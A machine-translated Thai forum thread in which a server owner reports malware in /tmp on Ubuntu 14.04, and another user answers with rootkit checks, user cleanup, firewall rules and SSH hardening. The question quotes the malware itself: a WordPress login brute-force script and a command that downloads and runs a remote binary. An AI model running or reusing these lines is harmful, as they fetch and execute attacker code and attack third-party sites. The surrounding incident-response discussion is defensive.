ไฟล์ที่ผิดปกติในโฟลเดอร์ temp UBUNTU SERVER 14.04

0

ฉันมีไฟล์ที่ผิดปกติในโฟลเดอร์ Ubuntu tmp ผู้ใดสามารถให้ความกระจ่างแก่มันและสิ่งที่อาจเป็นขั้นตอนการป้องกันของฉัน

ในโฟลเดอร์ temp มี 2 ไฟล์ชื่อ ScriptและURL

เมื่อฉัน nano script file: 

#!/bin/bash
if curl -s  --max-time 7 -d "log=$1" -d "pwd=$2" -d "wp-submit=Log+In" 
"$3"/wp-login.php  -i |grep -a "path=/wp-content/pl$

then
echo $3 $1 $2
fi

และ nano urlแสดงผลลัพธ์ที่ไม่สามารถอ่านได้

กระบวนการที่เป็นอันตรายต่อไปนี้กำลังทำงานกับคำสั่ง HTOP 

\par 2 S  0.0  0.0  0:00.00 sh -c cd /tmp;rm -rf url*;cd /tmp;rm -rf url;curl -O socks5.so/url;chmod 777 url;./url
\par 4 S  0.0  0.0  0:00.00 ./url

เมื่อสอบถาม id กระบวนการ: 

#ls -al /proc/12186/exe

Output is:
someuser someuser 0 Jun 17 06:06 /proc/12186/exe -> /bin/dash

เมื่อฉันลบไฟล์ในโฟลเดอร์ TEMP มันจะยังคงสร้างขึ้นมาใหม่ฉันจะหยุดสิ่งนี้ได้อย่างไรฉันเชื่อว่ากำลังใช้เซิร์ฟเวอร์ของฉันเพื่อโจมตีเว็บไซต์กดคำที่ติดตั้ง

linux  security  ubuntu-14.04 
KAKA BOOKIE
แหล่งที่มา

คำตอบ:

0

คุณได้รับการp0wned มันอาจเป็นเรื่องยากมากที่จะกำจัดสิ่งนี้

คุณสามารถดาวน์โหลดแพ็คเกจrkhunterอัปเดตได้

    rkhunter --update

ตัดการเชื่อมต่อพีซีของคุณจากเครือข่ายเรียกใช้:

    rkhunter -c

หากรายงานว่ามีรูทคิทโอกาสที่ดีที่สุดของคุณคือการติดตั้งระบบปฏิบัติการอีกครั้ง ในความเป็นจริงการมีรูทคิทโดยทั่วไปบ่งบอกว่าเป็นคู่ต่อสู้ที่เข้าใจและมีอุปกรณ์ครบครันการต่อสู้กับใครเป็นไปได้ แต่มีเวลาและความสามารถทางเทคนิคจำนวนมากซึ่งเป็นวิธีที่มากกว่ารูปแบบของฟอรัมนี้

หากไม่มีร่องรอยของรูทคิทคุณสามารถเริ่มต้น (พีซีของคุณยังคงออกจากเน็ต) ทำความสะอาดพีซีของคุณดังนี้:

  1. เปลี่ยนรหัสผ่านของคุณ;
  2. แก้ไขไฟล์ sudo (ด้วย visudo) และกำจัดผู้ใช้ทั้งหมดที่ไม่ใช่ผู้ใช้ระบบหรือตัวคุณเอง
  3. ค้นหาผู้ใช้อื่น ๆ (ในที่สุด) ด้วยเชลล์ล็อกอินใน / etc / passwd และลบออก
  4. ลบไดเรกทอรีบ้านของผู้ใช้เหล่านี้
  5. ปิดการใช้งาน ssh daemon โดยสิ้นเชิง
  6. ตั้งค่าการเฝ้าสังเกตด้วยinotifywaitบนไฟล์ระบบทั่วไปเช่น / var / log / wtmp
  7. ตั้งค่า iptables เพื่อบันทึกความพยายามในการเชื่อมต่อทั้งหมดและเพื่อป้องกันทราฟฟิกการเชื่อมต่อทั้งหมดยกเว้นพอร์ตที่ไม่ได้มาตรฐานสำหรับ ssh และที่เกี่ยวข้องกับการเชื่อมต่อที่มีอยู่เริ่มต้นด้วยตัวคุณเอง

จากนั้นเมื่อคุณกลับมาออนไลน์ให้ดาวน์โหลดfail2banโดยไม่ต้องติดตั้งลงจากเน็ตเริ่มต้น ssh daemon ติดตั้ง fail2ban

ตอนนี้เปลี่ยน ssh ของคุณให้ใช้เฉพาะคีย์การเข้ารหัสลับ, เพื่อเข้าสู่ระบบรูทบาร์และล็อกอินรหัสผ่าน ตอนนี้คุณสามารถกลับไปยังอินเทอร์เน็ตและอ่านบางส่วน หน้าบล็อกที่เหมาะสมเกี่ยวกับวิธีการรักษาความปลอดภัยเครื่อง Linux ของคุณ

MariusMatutiae
แหล่งที่มา
ฉันอยากจะพิจารณาเปลี่ยนเซิร์ฟเวอร์ แต่มีไฟล์ที่ติดไวรัสจำนวนมากเช่นกันโดยมีรหัสฐานสิบหกอยู่ภายในมีเครื่องมือใดสำหรับการค้นหา hexcode ภายในไฟล์หรือไม่
KAKA BOOKIE
ดังนั้นคุณได้พบคนที่มีความสามารถ มีโปรแกรมที่ใช้รหัสการค้นหาในไฟล์ระบบ: เรียกว่า Intrusion Detection Sytems เช่น Snort ถ้าคุณต้องการที่จะมองไปที่หนึ่งของพวกเขามีบรรณาธิการฐานสิบหกเช่น Bless, dhex คุณสามารถพบพวกเขากล่าวถึงที่นี่: en.wikipedia.org/wiki/Comparison_of_hex_editors แต่โอกาสที่ตามเวลาที่คุณทำบางสิ่งบางอย่างผู้ชายคนนี้จะมีการเคลื่อนไหวต่อต้านของคุณ คำแนะนำที่ดีที่สุดของฉันคือ: ติดตั้งทุกอย่างแล้วเรียนรู้วิธีรักษาความปลอดภัยระบบของคุณ คุณมีความเห็นอกเห็นใจของฉันถ้ามันเป็นปลอบใจใด ๆ
MariusMatutiae
โดยการใช้ไซต์ของเรา หมายความว่าคุณได้อ่านและทำความเข้าใจนโยบายคุกกี้และนโยบายความเป็นส่วนตัวของเราแล้ว
Licensed under cc by-sa 3.0 with attribution required.